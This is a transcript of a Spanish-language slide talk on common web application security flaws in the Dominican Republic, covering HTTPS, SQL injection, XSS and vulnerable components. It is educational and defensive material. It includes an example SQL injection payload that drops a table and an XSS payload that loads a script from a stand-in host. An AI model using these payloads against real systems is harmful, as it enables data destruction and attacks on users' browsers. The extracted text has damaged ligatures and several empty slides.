There Is No Silver Bullet (Español)

Transcript

1. there is no silver bullet Henri Watson

2. ¿Cuáles  son  los  problemas  que   comúnmente  afectan  a  las

    aplicaciones   web  en  la  República  Dominicana?  

3. Una  falta  de  HTTPS  

4. Usar  HTTPS  no  te  va  a  quitar  el   pica

    pollo  del  día.  

5. La  propuesta  actual  para    HTTP/2.0  obliga  el  uso  de

    TLS.    

6. Si  decides  usar  HTTPS,  también  usa   Strict-­‐Transport-­‐Security   y

    ssllabs.com/ssltest  

7. Inyecciones  SQL  

8. GET  /rastreador?orden=12345”;   DROP  TABLE  ordenes;-­‐-­‐   SELECT  *  FROM

    ordenes  WHERE  orden  =  “12345”;   DROP  TABLE  ordenes;-­‐-­‐”  AND  estado  =  “pendiente”   Solicitud  del   cliente  al  servidor.   Solicitud  del  servidor  web    a  la  base  de  datos.  
9. None
10. None
11. None

12. Problemas  en  el  manejo  de   autenacación  

13. None
14. None

15. Cross-­‐Site  Scripang  (XSS)  

16. GET  /hola?nombre=<script  src=“hhp://malva.do/ jajaxddd.js”></script>   ¡Hola,  <script  src=“hhp://malva.do/jajaxddd.js”></ script>!  

    Solicitud  del   cliente  al  servidor.   Respuesta  del   servidor  al  cliente.  

17. Content-­‐Security-­‐Policy  

18. Exposición  de  datos  sensiavos  

19. None

20. Ualizando  Componentes  con   Vulnerabilidades  Conocidas  

21. Mailing  Lists   •  bugtraq   hhp://www.securityfocus.com/archive/1   •  debian-­‐security-­‐announce

      hhps://lists.debian.org/debian-­‐security-­‐announce/   •  fulldisclosure   hhp://nmap.org/mailman/lisanfo/fulldisclosure  

22. Mailing  Lists   •  [email protected]   hhps://hhpd.apache.org/lists.html#hhp-­‐announce   •  nginx-­‐announce

      hhp://mailman.nginx.org/mailman/lisanfo/nginx-­‐ announce   •  php-­‐announce   hhp://php.net/mailing-­‐lists.php  
23. None

24. Servicio  a  Cliente  

25. None

26. ¿Por  qué  una  no  existe  una   «  bala  de

     plata  »?  

27. La  seguridad  informáaca  es  una   inversión  constante.  

28. Heartbleed  

29. Al  poner  los  datos  de  tus   usuarios  en  riesgo,

     también  pones   tu  reputación  en  riesgo.  

30. ¡Gracias!   @henriwatson   [email protected]     hhps://henriwatson.com/talks/silverbullet